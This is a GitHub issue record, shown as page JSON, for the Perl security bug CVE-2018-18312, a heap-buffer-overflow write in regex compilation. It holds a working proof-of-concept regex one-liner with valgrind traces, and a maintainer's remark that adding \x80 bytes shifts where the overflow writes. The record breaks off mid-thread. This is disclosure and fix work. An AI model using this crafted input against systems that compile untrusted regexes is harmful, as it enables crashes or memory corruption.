type="application/json" data-target="react-app.embeddedData">{"payload":{"preloaded_records":{},"preloadedQueries":[{"queryId":"3dddeeb0bc5f88ccaca7204fa97a09b8","queryName":"IssueViewerViewQuery","variables":{"id":"repository","number":16649,"owner":"Perl","repo":"perl5"},"result":{"data":{"repository":{"isOwnerEnterpriseManaged":false,"issue":{"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","updatedAt":"2019-05-22T15:06:10Z","title":"[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2)","number":16649,"repository":{"nameWithOwner":"Perl/perl5","id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","login":"Perl","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","url":"https://github.com/Perl"},"isArchived":false,"isPrivate":false,"databaseId":8183570,"slashCommandsEnabled":false,"viewerCanInteract":false,"viewerInteractionLimitReasonHTML":"","planFeatures":{"maximumAssignees":10},"visibility":"PUBLIC","pinnedIssues":{"totalCount":0},"viewerCanPinIssues":false,"issueTypes":{"edges":[{"node":{"id":"IT_kwDOADa1g84ABOlf"}},{"node":{"id":"IT_kwDOADa1g84ABOli"}},{"node":{"id":"IT_kwDOADa1g84ABOln"}}]}},"titleHTML":"[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2)","url":"https://github.com/Perl/perl5/issues/16649","viewerCanUpdateNext":false,"issueType":null,"state":"CLOSED","stateReason":"COMPLETED","duplicateOf":null,"linkedPullRequests":{"nodes":[]},"subIssuesSummary":{"total":0,"completed":0},"__isLabelable":"Issue","labels":{"edges":[],"pageInfo":{"endCursor":null,"hasNextPage":false}},"__isNode":"Issue","assignees":{"nodes":[]},"milestone":null,"databaseId":509394960,"viewerDidAuthor":false,"locked":false,"author":{"__typename":"User","__isActor":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4","profileUrl":"https://github.com/p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4"},"__isComment":"Issue","body":"Migrated from [rt.perl.org#133423](https://rt-archive.perl.org/perl5/Ticket/Display.html?id=133423) (status was 'resolved')\n\nSearchable as RT133423$\n","bodyHTML":"\u003cp dir=\"auto\"\u003eMigrated from \u003ca href=\"https://rt-archive.perl.org/perl5/Ticket/Display.html?id=133423\" rel=\"nofollow\"\u003ert.perl.org#133423\u003c/a\u003e (status was 'resolved')\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSearchable as RT133423$\u003c/p\u003e","bodyVersion":"323dd0399cdfff77d2296cb04aab48cc64d031118cac256ff321a0c11c89d951","createdAt":"2018-08-04T09:32:13Z","__isReactable":"Issue","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"viewerCanUpdateMetadata":false,"viewerCanComment":false,"viewerCanAssign":false,"viewerCanLabel":false,"__isIssueOrPullRequest":"Issue","projectItemsNext":{"edges":[],"pageInfo":{"endCursor":null,"hasNextPage":false}},"viewerCanSetMilestone":false,"isPinned":false,"viewerCanDelete":false,"viewerCanTransfer":false,"viewerCanConvertToDiscussion":false,"viewerCanLock":false,"viewerCanType":false,"frontTimelineItems":{"pageInfo":{"hasNextPage":true,"endCursor":"Y3Vyc29yOnYyOpPPAAABZg8K98gAqTU0NDA5NzQ2MQ=="},"totalCount":33,"edges":[{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097440,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0MA==","body":"### From @Etsukata\n\n\\# Summary\n\n\\- a crafted regular expression can cause heap\\-buffer\\-overflow write during\ncompilation\n\n\\# Affected Versions\n\n\\- 5\\.29\\.1\n\\- 5\\.28\\.0\n\\- 5\\.26\\.2\n\n\\# PoC\n\n\\- 5\\.28\\.0\n\\`\\`\\`\n$ valgrind \\-\\-leak\\-check=no perl \\-le 'my $r =\n\"\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[\\\\\\\\\\\\x00\\]\\)\\)\\\\\\\\\\]\\\\x00|2\\[^^\\]\\\\x80\\\\x80\\\\x80\\\\x80\\]\\)R\\.\\\\\\\\670\"; qr/$r/'\n\n==6867== Memcheck\\, a memory error detector\n==6867== Copyright \\(C\\) 2002\\-2017\\, and GNU GPL'd\\, by Julian Seward et al\\.\n==6867== Using Valgrind\\-3\\.13\\.0 and LibVEX; rerun with \\-h for copyright info\n==6867== Command\u0026#8203;: perl \\-le my\\\\ $r\\\\ =\\\\\n\"\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\\\\\\\\\x00\\]\\)\\)\\\\\\\\\\\\\\\\\\]\\\\\\\\x00|2\\[^^\\]\\\\\\\\x80\\\\\\\\x80\\\\\\\\x80\\\\\\\\x80\\]\\)R\\.\\\\\\\\\\\\\\\\670\";\\\\\nqr/$r/\n==6867==\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[ \\\u003c\\-\\- HERE \\(?\\-\u0026#8203;:\\(?\\[\\\\\\]\\)\\)\\\\\\]|2\\[^^\\]????\\]\\)R\\.\\\\670/ at \\-e line 1\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\\\]\\)\\)\\\\\\]|2\\[^^\\]????\\]\\)R\\.\\\\670/ at \\-e line 1\\.\n==6867== Invalid write of size 1\n==6867== at 0x4C13FD\u0026#8203;: S\\_regatom \\(regcomp\\.c\u0026#8203;:14041\\)\n==6867== by 0x4C48A8\u0026#8203;: S\\_regpiece \\(regcomp\\.c\u0026#8203;:12003\\)\n==6867== by 0x4C48A8\u0026#8203;: S\\_regbranch \\(regcomp\\.c\u0026#8203;:11931\\)\n==6867== by 0x4B3A02\u0026#8203;: S\\_reg \\(regcomp\\.c\u0026#8203;:11708\\)\n==6867== by 0x4D6160\u0026#8203;: Perl\\_re\\_op\\_compile \\(regcomp\\.c\u0026#8203;:7434\\)\n==6867== by 0x58549B\u0026#8203;: Perl\\_pp\\_regcomp \\(pp\\_ctl\\.c\u0026#8203;:110\\)\n==6867== by 0x4DD269\u0026#8203;: Perl\\_runops\\_debug \\(dump\\.c\u0026#8203;:2536\\)\n==6867== by 0x4543AD\u0026#8203;: S\\_run\\_body \\(perl\\.c\u0026#8203;:2694\\)\n==6867== by 0x4543AD\u0026#8203;: perl\\_run \\(perl\\.c\u0026#8203;:2617\\)\n==6867== by 0x41FA49\u0026#8203;: main \\(perlmain\\.c\u0026#8203;:122\\)\n==6867== Address 0x7d36680 is 0 bytes after a block of size 160 alloc'd\n==6867== at 0x4C2EBAB\u0026#8203;: malloc \\(vg\\_replace\\_malloc\\.c\u0026#8203;:299\\)\n==6867== by 0x4E6400\u0026#8203;: Perl\\_safesysmalloc \\(util\\.c\u0026#8203;:153\\)\n==6867== by 0x4D598D\u0026#8203;: Perl\\_re\\_op\\_compile \\(regcomp\\.c\u0026#8203;:7280\\)\n==6867== by 0x58549B\u0026#8203;: Perl\\_pp\\_regcomp \\(pp\\_ctl\\.c\u0026#8203;:110\\)\n==6867== by 0x4DD269\u0026#8203;: Perl\\_runops\\_debug \\(dump\\.c\u0026#8203;:2536\\)\n==6867== by 0x4543AD\u0026#8203;: S\\_run\\_body \\(perl\\.c\u0026#8203;:2694\\)\n==6867== by 0x4543AD\u0026#8203;: perl\\_run \\(perl\\.c\u0026#8203;:2617\\)\n==6867== by 0x41FA49\u0026#8203;: main \\(perlmain\\.c\u0026#8203;:122\\)\n==6867==\npanic\u0026#8203;: reg\\_node overrun trying to emit 0\\, 7d36684\u003e=7d3667c at \\-e line 1\\.\n==6867==\n==6867== HEAP SUMMARY\u0026#8203;:\n==6867== in use at exit\u0026#8203;: 154\\,595 bytes in 670 blocks\n==6867== total heap usage\u0026#8203;: 950 allocs\\, 280 frees\\, 200\\,836 bytes allocated\n==6867==\n==6867== For a detailed leak analysis\\, rerun with\u0026#8203;: \\-\\-leak\\-check=full\n==6867==\n==6867== For counts of detected and suppressed errors\\, rerun with\u0026#8203;: \\-v\n==6867== ERROR SUMMARY\u0026#8203;: 1 errors from 1 contexts \\(suppressed\u0026#8203;: 0 from 0\\)\n\\`\\`\\`\n\n\\- 5\\.26\\.2\n\\`\\`\\`\n$ valgrind \\-\\-leak\\-check=no perl \\-le 'my $r =\n\"\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[\\\\\\\\\\\\x00\\]\\)\\)\\\\\\\\\\]\\\\x00|2\\[^^\\]\\\\x80\\\\x80\\\\x80\\\\x80\\]\\)R\\.\\\\\\\\670\"; qr/$r/'\n==19854== Memcheck\\, a memory error detector\n==19854== Copyright \\(C\\) 2002\\-2017\\, and GNU GPL'd\\, by Julian Seward et al\\.\n==19854== Using Valgrind\\-3\\.13\\.0 and LibVEX; rerun with \\-h for copyright info\n==19854== Command\u0026#8203;: perl \\-le my\\\\ $r\\\\ =\\\\\n\"\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\\\\\\\\\x00\\]\\)\\)\\\\\\\\\\\\\\\\\\]\\\\\\\\x00|2\\[^^\\]\\\\\\\\x80\\\\\\\\x80\\\\\\\\x80\\\\\\\\x80\\]\\)R\\.\\\\\\\\\\\\\\\\670\";\\\\\nqr/$r/\n==19854==\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[ \\\u003c\\-\\- HERE \\(?\\-\u0026#8203;:\\(?\\[\\\\\\]\\)\\)\\\\\\]|2\\[^^\\]????\\]\\)R\\.\\\\670/ at \\-e line 1\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\\\]\\)\\)\\\\\\]|2\\[^^\\]????\\]\\)R\\.\\\\670/ at \\-e line 1\\.\n==19854== Invalid write of size 1\n==19854== at 0x5D9544\u0026#8203;: Perl\\_uvoffuni\\_to\\_utf8\\_flags \\(utf8\\.c\u0026#8203;:154\\)\n==19854== by 0x4BAB11\u0026#8203;: S\\_regatom \\(regcomp\\.c\u0026#8203;:13493\\)\n==19854== by 0x4BC535\u0026#8203;: S\\_regpiece \\(regcomp\\.c\u0026#8203;:11673\\)\n==19854== by 0x4BC535\u0026#8203;: S\\_regbranch \\(regcomp\\.c\u0026#8203;:11598\\)\n==19854== by 0x4ADBF8\u0026#8203;: S\\_reg \\(regcomp\\.c\u0026#8203;:11385\\)\n==19854== by 0x4D1531\u0026#8203;: Perl\\_re\\_op\\_compile \\(regcomp\\.c\u0026#8203;:7313\\)\n==19854== by 0x57D4AE\u0026#8203;: Perl\\_pp\\_regcomp \\(pp\\_ctl\\.c\u0026#8203;:108\\)\n==19854== by 0x4D8231\u0026#8203;: Perl\\_runops\\_debug \\(dump\\.c\u0026#8203;:2451\\)\n==19854== by 0x454455\u0026#8203;: S\\_run\\_body \\(perl\\.c\u0026#8203;:2532\\)\n==19854== by 0x454455\u0026#8203;: perl\\_run \\(perl\\.c\u0026#8203;:2455\\)\n==19854== by 0x421B89\u0026#8203;: main \\(perlmain\\.c\u0026#8203;:123\\)\n==19854== Address 0x6029970 is 0 bytes after a block of size 160 alloc'd\n==19854== at 0x4C2EBAB\u0026#8203;: malloc \\(vg\\_replace\\_malloc\\.c\u0026#8203;:299\\)\n==19854== by 0x4E1130\u0026#8203;: Perl\\_safesysmalloc \\(util\\.c\u0026#8203;:153\\)\n==19854== by 0x4D0E0C\u0026#8203;: Perl\\_re\\_op\\_compile \\(regcomp\\.c\u0026#8203;:7159\\)\n==19854== by 0x57D4AE\u0026#8203;: Perl\\_pp\\_regcomp \\(pp\\_ctl\\.c\u0026#8203;:108\\)\n==19854== by 0x4D8231\u0026#8203;: Perl\\_runops\\_debug \\(dump\\.c\u0026#8203;:2451\\)\n==19854== by 0x454455\u0026#8203;: S\\_run\\_body \\(perl\\.c\u0026#8203;:2532\\)\n==19854== by 0x454455\u0026#8203;: perl\\_run \\(perl\\.c\u0026#8203;:2455\\)\n==19854== by 0x421B89\u0026#8203;: main \\(perlmain\\.c\u0026#8203;:123\\)\n==19854==\npanic\u0026#8203;: reg\\_node overrun trying to emit 0\\, 6029974\u003e=602996c at \\-e line 1\\.\n==19854==\n==19854== HEAP SUMMARY\u0026#8203;:\n==19854== in use at exit\u0026#8203;: 124\\,573 bytes in 663 blocks\n==19854== total heap usage\u0026#8203;: 938 allocs\\, 275 frees\\, 169\\,419 bytes allocated\n==19854==\n==19854== For a detailed leak analysis\\, rerun with\u0026#8203;: \\-\\-leak\\-check=full\n==19854==\n==19854== For counts of detected and suppressed errors\\, rerun with\u0026#8203;: \\-v\n==19854== ERROR SUMMARY\u0026#8203;: 1 errors from 1 contexts \\(suppressed\u0026#8203;: 0 from 0\\)\n\\`\\`\\`","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/Etsukata/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/Etsukata\"\u003e@Etsukata\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003e# Summary\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- a crafted regular expression can cause heap-buffer-overflow write during\u003cbr\u003e\ncompilation\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# Affected Versions\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- 5.29.1\u003cbr\u003e\n- 5.28.0\u003cbr\u003e\n- 5.26.2\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# PoC\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- 5.28.0\u003cbr\u003e\n```\u003cbr\u003e\n$ valgrind --leak-check=no perl -le 'my $r =\u003cbr\u003e\n\"(?[(?-:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80])R.\\\\670\"; qr/$r/'\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e==6867== Memcheck, a memory error detector\u003cbr\u003e\n==6867== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.\u003cbr\u003e\n==6867== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info\u003cbr\u003e\n==6867== Command: perl -le my\\ $r\\ =\\\u003cbr\u003e\n\"(?[(?-:(?[\\\\\\\\\\\\x00]))\\\\\\\\]\\\\x00|2[^^]\\\\x80\\\\x80\\\\x80\\\\x80])R.\\\\\\\\670\";\\\u003cbr\u003e\nqr/$r/\u003cbr\u003e\n==6867==\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?-:(?[\\]))\\]|2[^^]????])R.\\670/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?-:(?[ \u0026lt;-- HERE \\]))\\]|2[^^]????])R.\\670/ at -e line 1.\u003cbr\u003e\n==6867== Invalid write of size 1\u003cbr\u003e\n==6867== at 0x4C13FD: S_regatom (regcomp.c:14041)\u003cbr\u003e\n==6867== by 0x4C48A8: S_regpiece (regcomp.c:12003)\u003cbr\u003e\n==6867== by 0x4C48A8: S_regbranch (regcomp.c:11931)\u003cbr\u003e\n==6867== by 0x4B3A02: S_reg (regcomp.c:11708)\u003cbr\u003e\n==6867== by 0x4D6160: Perl_re_op_compile (regcomp.c:7434)\u003cbr\u003e\n==6867== by 0x58549B: Perl_pp_regcomp (pp_ctl.c:110)\u003cbr\u003e\n==6867== by 0x4DD269: Perl_runops_debug (dump.c:2536)\u003cbr\u003e\n==6867== by 0x4543AD: S_run_body (perl.c:2694)\u003cbr\u003e\n==6867== by 0x4543AD: perl_run (perl.c:2617)\u003cbr\u003e\n==6867== by 0x41FA49: main (perlmain.c:122)\u003cbr\u003e\n==6867== Address 0x7d36680 is 0 bytes after a block of size 160 alloc'd\u003cbr\u003e\n==6867== at 0x4C2EBAB: malloc (vg_replace_malloc.c:299)\u003cbr\u003e\n==6867== by 0x4E6400: Perl_safesysmalloc (util.c:153)\u003cbr\u003e\n==6867== by 0x4D598D: Perl_re_op_compile (regcomp.c:7280)\u003cbr\u003e\n==6867== by 0x58549B: Perl_pp_regcomp (pp_ctl.c:110)\u003cbr\u003e\n==6867== by 0x4DD269: Perl_runops_debug (dump.c:2536)\u003cbr\u003e\n==6867== by 0x4543AD: S_run_body (perl.c:2694)\u003cbr\u003e\n==6867== by 0x4543AD: perl_run (perl.c:2617)\u003cbr\u003e\n==6867== by 0x41FA49: main (perlmain.c:122)\u003cbr\u003e\n==6867==\u003cbr\u003e\npanic: reg_node overrun trying to emit 0, 7d36684\u0026gt;=7d3667c at -e line 1.\u003cbr\u003e\n==6867==\u003cbr\u003e\n==6867== HEAP SUMMARY:\u003cbr\u003e\n==6867== in use at exit: 154,595 bytes in 670 blocks\u003cbr\u003e\n==6867== total heap usage: 950 allocs, 280 frees, 200,836 bytes allocated\u003cbr\u003e\n==6867==\u003cbr\u003e\n==6867== For a detailed leak analysis, rerun with: --leak-check=full\u003cbr\u003e\n==6867==\u003cbr\u003e\n==6867== For counts of detected and suppressed errors, rerun with: -v\u003cbr\u003e\n==6867== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- 5.26.2\u003cbr\u003e\n```\u003cbr\u003e\n$ valgrind --leak-check=no perl -le 'my $r =\u003cbr\u003e\n\"(?[(?-:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80])R.\\\\670\"; qr/$r/'\u003cbr\u003e\n==19854== Memcheck, a memory error detector\u003cbr\u003e\n==19854== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.\u003cbr\u003e\n==19854== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info\u003cbr\u003e\n==19854== Command: perl -le my\\ $r\\ =\\\u003cbr\u003e\n\"(?[(?-:(?[\\\\\\\\\\\\x00]))\\\\\\\\]\\\\x00|2[^^]\\\\x80\\\\x80\\\\x80\\\\x80])R.\\\\\\\\670\";\\\u003cbr\u003e\nqr/$r/\u003cbr\u003e\n==19854==\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?-:(?[\\]))\\]|2[^^]????])R.\\670/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?-:(?[ \u0026lt;-- HERE \\]))\\]|2[^^]????])R.\\670/ at -e line 1.\u003cbr\u003e\n==19854== Invalid write of size 1\u003cbr\u003e\n==19854== at 0x5D9544: Perl_uvoffuni_to_utf8_flags (utf8.c:154)\u003cbr\u003e\n==19854== by 0x4BAB11: S_regatom (regcomp.c:13493)\u003cbr\u003e\n==19854== by 0x4BC535: S_regpiece (regcomp.c:11673)\u003cbr\u003e\n==19854== by 0x4BC535: S_regbranch (regcomp.c:11598)\u003cbr\u003e\n==19854== by 0x4ADBF8: S_reg (regcomp.c:11385)\u003cbr\u003e\n==19854== by 0x4D1531: Perl_re_op_compile (regcomp.c:7313)\u003cbr\u003e\n==19854== by 0x57D4AE: Perl_pp_regcomp (pp_ctl.c:108)\u003cbr\u003e\n==19854== by 0x4D8231: Perl_runops_debug (dump.c:2451)\u003cbr\u003e\n==19854== by 0x454455: S_run_body (perl.c:2532)\u003cbr\u003e\n==19854== by 0x454455: perl_run (perl.c:2455)\u003cbr\u003e\n==19854== by 0x421B89: main (perlmain.c:123)\u003cbr\u003e\n==19854== Address 0x6029970 is 0 bytes after a block of size 160 alloc'd\u003cbr\u003e\n==19854== at 0x4C2EBAB: malloc (vg_replace_malloc.c:299)\u003cbr\u003e\n==19854== by 0x4E1130: Perl_safesysmalloc (util.c:153)\u003cbr\u003e\n==19854== by 0x4D0E0C: Perl_re_op_compile (regcomp.c:7159)\u003cbr\u003e\n==19854== by 0x57D4AE: Perl_pp_regcomp (pp_ctl.c:108)\u003cbr\u003e\n==19854== by 0x4D8231: Perl_runops_debug (dump.c:2451)\u003cbr\u003e\n==19854== by 0x454455: S_run_body (perl.c:2532)\u003cbr\u003e\n==19854== by 0x454455: perl_run (perl.c:2455)\u003cbr\u003e\n==19854== by 0x421B89: main (perlmain.c:123)\u003cbr\u003e\n==19854==\u003cbr\u003e\npanic: reg_node overrun trying to emit 0, 6029974\u0026gt;=602996c at -e line 1.\u003cbr\u003e\n==19854==\u003cbr\u003e\n==19854== HEAP SUMMARY:\u003cbr\u003e\n==19854== in use at exit: 124,573 bytes in 663 blocks\u003cbr\u003e\n==19854== total heap usage: 938 allocs, 275 frees, 169,419 bytes allocated\u003cbr\u003e\n==19854==\u003cbr\u003e\n==19854== For a detailed leak analysis, rerun with: --leak-check=full\u003cbr\u003e\n==19854==\u003cbr\u003e\n==19854== For counts of detected and suppressed errors, rerun with: -v\u003cbr\u003e\n==19854== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)\u003cbr\u003e\n```\u003c/p\u003e","bodyVersion":"3149a8ebdf3319e9dc743cb2776a144cae42efa0e6f616d8e24e38a4a6d967a5","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097440","createdAt":"2018-08-04T09:32:13Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZQRHtUgAqTU0NDA5NzQ0MA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097441,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0MQ==","body":"### From @khwilliamson\n\nI suspect this is a serious security issue\\. One can position where beyond the end of buffer gets written by adding \\\\x80's to the ones already there\\. But I'd be happy to be wrong about this\\.\n\nThe cause is one branch during the parsing leaves the parse pointer positioned one too far\\, and that causes the backslash to be skipped during pass2\\, which causes a '\\]' to be treated as a metacharacter instead of a literal\\.\n\nThe fix is to remove the single line that incorrectly increments the parse pointer\\. \nI don't know that this being an experimental feature has any bearing on it\\.\n\nThere is another thing\\. The minus sign in this case could have been caught as incorrect\\. But the same out\\-of\\-bounds writes would occur if a '^' replaced the minus\\, and that would be a correct use\\.\n\nKarl Williamson","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eI suspect this is a serious security issue. One can position where beyond the end of buffer gets written by adding \\x80's to the ones already there. But I'd be happy to be wrong about this.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer positioned one too far, and that causes the backslash to be skipped during pass2, which causes a ']' to be treated as a metacharacter instead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the parse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing on it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been caught as incorrect. But the same out-of-bounds writes would occur if a '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eKarl Williamson\u003c/p\u003e","bodyVersion":"c47018853182a7b03fa403365a25906ae1ccbf24de99555912c61b59cdd2960e","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097441","createdAt":"2018-08-15T18:01:24Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZT6_1SAAqTU0NDA5NzQ0MQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097442,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0Mg==","body":"The RT System itself - Status changed from 'new' to 'open'\n\n","bodyHTML":"\u003cp dir=\"auto\"\u003eThe RT System itself - Status changed from 'new' to 